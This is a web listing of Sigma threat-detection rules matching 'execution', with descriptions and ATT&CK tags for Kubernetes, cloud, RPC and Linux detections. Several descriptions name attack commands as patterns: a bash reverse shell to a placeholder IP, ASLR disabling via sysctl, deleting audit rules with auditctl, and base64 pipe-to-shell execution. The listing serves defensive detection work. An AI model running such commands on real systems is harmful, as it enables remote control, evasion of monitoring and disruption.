Rule Library

Sigma Rules

1,478 rules found for "execution"

3,707Total
3,116Detection
451Emerging
137Hunting
Detectionhightest

Process Execution Error In JVM Based Application

Detects process execution related exceptions in JVM based apps, often relates to RCE

jvmapplication
TA0001 · Initial AccessT1190 · Exploit Public-Facing Application
Moti HarmatsSat Feb 11application
Detectionmediumtest

Kubernetes CronJob/Job Modification

Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.

Kubernetesaudit
TA0003 · PersistenceTA0004 · Privilege EscalationTA0002 · Execution
kelnageThu Jul 11application
Detectionmediumtest

Potential Remote Command Execution In Pod Container

Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.

Kubernetesapplicationaudit
T1609 · Container Administration CommandTA0002 · Execution
Leo TsaousisTue Mar 26application
Detectionmediumtest

Potential Sidecar Injection Into Running Deployment

Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.

Kubernetesapplicationaudit
T1609 · Container Administration CommandTA0002 · Execution
Leo TsaousisTue Mar 26application
Detectionhightest

Potential RCE Exploitation Attempt In NodeJS

Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.

nodejsapplication
TA0001 · Initial AccessT1190 · Exploit Public-Facing Application
Moti HarmatsSat Feb 11application
Detectionhightest

Remote Schedule Task Lateral Movement via ATSvc

Detects remote RPC calls to create or execute a scheduled task via ATSvc

rpc_firewallapplication
TA0004 · Privilege EscalationTA0008 · Lateral MovementTA0002 · ExecutionTA0003 · Persistence+2
Sagie Dulce+1Sat Jan 01application
Detectionhightest

Remote Schedule Task Lateral Movement via ITaskSchedulerService

Detects remote RPC calls to create or execute a scheduled task

rpc_firewallapplication
TA0004 · Privilege EscalationTA0003 · PersistenceTA0002 · ExecutionTA0008 · Lateral Movement+2
Sagie Dulce+1Sat Jan 01application
Detectionhightest

Remote DCOM/WMI Lateral Movement

Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.

rpc_firewallapplication
TA0008 · Lateral MovementTA0002 · ExecutionT1021.003 · Distributed Component Object ModelT1047 · Windows Management Instrumentation
Sagie Dulce+1Sat Jan 01application
Detectionhightest

Remote Server Service Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

rpc_firewallapplication
TA0008 · Lateral MovementTA0002 · ExecutionT1569.002 · Service Execution
Sagie Dulce+1Sat Jan 01application
Detectionhightest

Remote Schedule Task Lateral Movement via SASec

Detects remote RPC calls to create or execute a scheduled task via SASec

rpc_firewallapplication
TA0004 · Privilege EscalationTA0008 · Lateral MovementTA0002 · ExecutionTA0003 · Persistence+2
Sagie Dulce+1Sat Jan 01application
Detectioncriticalstable

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Antivirus Alert
TA0002 · ExecutionT1203 · Exploitation for Client ExecutionTA0011 · Command and Controlattack.t1219.002
Florian Roth (Nextron Systems)+1Sun Sep 09category
Detectionhighstable

Antivirus Hacktool Detection

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Antivirus Alert
TA0002 · ExecutionT1204 · User Execution
Florian Roth (Nextron Systems)+1Mon Aug 16category
Detectionmediumexperimental

PUA - AWS TruffleHog Execution

Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment. It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.

AWScloudtrail
TA0006 · Credential AccessT1555 · Credentials from Password StoresT1003 · OS Credential Dumping
Swachchhanda Shrawan Poudel (Nextron Systems)Tue Oct 21cloud
Detectionhightest

AWS EC2 Startup Shell Script Change

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

AWScloudtrail
TA0002 · ExecutionT1059.001 · PowerShellT1059.003 · Windows Command ShellT1059.004 · Unix Shell
falokerWed Feb 12cloud
Detectionhightest

AWS IAM S3Browser LoginProfile Creation

Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.

AWScloudtrail
TA0002 · ExecutionTA0003 · PersistenceTA0005 · Defense EvasionTA0001 · Initial Access+3
daniel.bohannonWed May 17cloud
Detectionhightest

AWS IAM S3Browser Templated S3 Bucket Policy Creation

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "<YOUR-BUCKET-NAME>".

AWScloudtrail
TA0002 · ExecutionT1059.009 · Cloud APITA0003 · PersistenceTA0005 · Defense Evasion+3
daniel.bohannonWed May 17cloud
Detectionhightest

AWS IAM S3Browser User or AccessKey Creation

Detects S3 Browser utility creating IAM User or AccessKey.

AWScloudtrail
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceTA0005 · Defense Evasion+3
daniel.bohannonWed May 17cloud
Detectionmediumtest

Azure Kubernetes CronJob

Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Azureactivitylogs
TA0003 · PersistenceT1053.003 · CronTA0004 · Privilege EscalationTA0002 · Execution
Austin SongerMon Nov 22cloud
Detectionmediumtest

Azure New CloudShell Created

Identifies when a new cloudshell is created inside of Azure portal.

Azureactivitylogs
TA0002 · ExecutionT1059 · Command and Scripting Interpreter
Austin SongerTue Sep 21cloud
Detectionmediumtest

Google Cloud Kubernetes CronJob

Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Google Cloudgcp.audit
TA0003 · PersistenceTA0004 · Privilege EscalationTA0002 · Execution
Austin SongerMon Nov 22cloud
Detectionmediumtest

Suspicious Commands Linux

Detects relevant commands often related to malware or hacking activity

Linuxauditd
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Tue Dec 12linux
Detectionlowtest

System Owner or User Discovery - Linux

Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Linuxauditd
TA0007 · DiscoveryT1033 · System Owner/User Discovery
Timur Zinniatullin+1Mon Oct 21linux
Detectionhighexperimental

ASLR Disabled Via Sysctl or Direct Syscall - Linux

Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including: - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000) - Modification of the /proc/sys/kernel/randomize_va_space file - Execution of the `sysctl` command to set `kernel.randomize_va_space=0` Disabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms. A successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.

Linuxauditd
TA0004 · Privilege EscalationTA0005 · Defense EvasionT1562.001 · Disable or Modify ToolsT1055.009 · Proc Memory
Milad CheraghiMon May 26linux
Detectionhightest

BPFDoor Abnormal Process ID or Lock File Accessed

detects BPFDoor .lock and .pid files access in temporary file storage facility

Linuxauditd
TA0002 · ExecutionT1106 · Native APIT1059 · Command and Scripting Interpreter
Rafal PiaseckiWed Aug 10linux
Detectionlowtest

Use Of Hidden Paths Or Files

Detects calls to hidden files or files located in hidden directories in NIX systems.

Linuxauditd
TA0004 · Privilege EscalationTA0003 · PersistenceTA0005 · Defense EvasionT1574.001 · DLL Search Order Hijacking
David BurkettFri Dec 30linux
Detectionmediumexperimental

Potential Abuse of Linux Magic System Request Key

Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes, or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.

Linuxauditd
TA0002 · ExecutionT1059.004 · Unix ShellTA0040 · ImpactT1529 · System Shutdown/Reboot+2
Milad CheraghiFri May 23linux
Detectionmediumtest

Program Executions in Suspicious Folders

Detects program executions in suspicious non-program folders related to malware or hacking activity

Linuxauditd
T1587 · Develop CapabilitiesT1584 · Compromise InfrastructureTA0042 · Resource Development
Florian Roth (Nextron Systems)Tue Jan 23linux
Detectioncriticaltest

Webshell Remote Command Execution

Detects possible command execution by web application/web shell

Linuxauditd
TA0003 · PersistenceT1505.003 · Web Shell
Ilyas Ochkov+2Sat Oct 12linux
Detectionmediumtest

Modifying Crontab

Detects suspicious modification of crontab file.

Linuxcron
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.003 · Cron
Pawel MazurSat Apr 16linux
Detectionhightest

Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

Linux
TA0002 · ExecutionG0020 · G0020T1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sun Apr 09linux
Detectionhightest

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

Linux
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Mon Aug 21linux
Detectionhightest

Suspicious Reverse Shell Command Line

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell

Linux
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Tue Apr 02linux
Detectionhightest

JexBoss Command Sequence

Detects suspicious command sequence that JexBoss

Linux
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Thu Aug 24linux
Detectionhightest

Symlink Etc Passwd

Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd

Linux
T1204.001 · Malicious LinkTA0002 · Execution
Florian Roth (Nextron Systems)Fri Apr 05linux
Detectionmediumtest

Persistence Via Cron Files

Detects creation of cron file or files in Cron directories which could indicates potential persistence.

LinuxFile Event
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.003 · Cron
Roberto Rodriguez (Cyb3rWard0g)+2Fri Oct 15linux
Detectionmediumtest

Persistence Via Sudoers Files

Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.

LinuxFile Event
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.003 · Cron
Nasreddine Bencherchali (Nextron Systems)Tue Jul 05linux
Detectionhighexperimental

Suspicious Filename with Embedded Base64 Commands

Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.

LinuxFile Event
TA0002 · ExecutionT1059.004 · Unix ShellTA0005 · Defense EvasionT1027 · Obfuscated Files or Information
kostastsaleSat Nov 22linux
Detectionhightest

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method

LinuxFile Event
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceTA0005 · Defense Evasion+1
Nasreddine Bencherchali (Nextron Systems)Tue Jul 05linux
Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

LinuxNetwork Connection
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sat Oct 16linux
Detectionmediumtest

Shell Invocation via Apt - Linux

Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

LinuxProcess Creation
TA0007 · DiscoveryT1083 · File and Directory Discovery
Nasreddine Bencherchali (Nextron Systems)Wed Dec 28linux
Detectionlowstable

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

LinuxProcess Creation
TA0004 · Privilege EscalationTA0002 · ExecutionTA0003 · PersistenceT1053.002 · At
Ömer Günal+1Tue Oct 06linux
Detectionhighexperimental

Audit Rules Deleted Via Auditctl

Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. Removal of audit rules can significantly impair detection of malicious activities on the affected system.

LinuxProcess Creation
TA0005 · Defense EvasionT1562.012 · Disable or Modify Linux Audit System
Mohamed LAKRIFri Oct 17linux
Detectionhighexperimental

Kaspersky Endpoint Security Stopped Via CommandLine - Linux

Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.

LinuxProcess Creation
TA0002 · ExecutionTA0005 · Defense EvasionT1562.001 · Disable or Modify Tools
Milad CheraghiSat Oct 18linux
Detectionhightest

Suspicious Invocation of Shell via AWK - Linux

Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

LinuxProcess Creation
TA0002 · ExecutionT1059 · Command and Scripting Interpreter
Li Ling+3Mon Sep 02linux
Detectionmediumtest

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

LinuxProcess Creation
TA0005 · Defense EvasionT1140 · Deobfuscate/Decode Files or Information
Martin MuellerTue Jul 26linux
Detectionlowtest

Bash Interactive Shell

Detects execution of the bash shell with the interactive flag "-i".

LinuxProcess Creation
TA0002 · Execution
@d4ns4n_Fri Apr 07linux
Detectionmediumtest

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

LinuxProcess Creation
TA0002 · ExecutionT1059.004 · Unix Shell
Andreas HunkelerFri Feb 11linux
Detectionmediumtest

Enable BPF Kprobes Tracing

Detects common command used to enable bpf kprobes tracing

LinuxProcess Creation
TA0002 · ExecutionTA0005 · Defense Evasion
Nasreddine Bencherchali (Nextron Systems)Wed Jan 25linux